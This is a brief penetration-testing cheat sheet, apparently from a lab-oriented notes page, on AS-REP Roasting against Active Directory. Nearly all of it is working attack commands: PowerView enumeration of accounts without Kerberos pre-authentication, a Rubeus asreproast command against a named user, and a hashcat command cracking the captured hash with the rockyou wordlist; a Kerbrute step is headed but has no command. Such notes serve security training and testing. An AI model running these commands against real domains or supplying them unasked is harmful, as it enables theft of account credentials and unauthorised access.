ASREPRoasting
1. Enumerate Users with Pre-Authentication Not Required
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl2. Perform ASREPRoasting Attack with Rubeus
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat3. Crack Captured Hash with Hashcat
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt4. Enumerate Users and Retrieve ASREP Hashes with Kerbrute
Last updated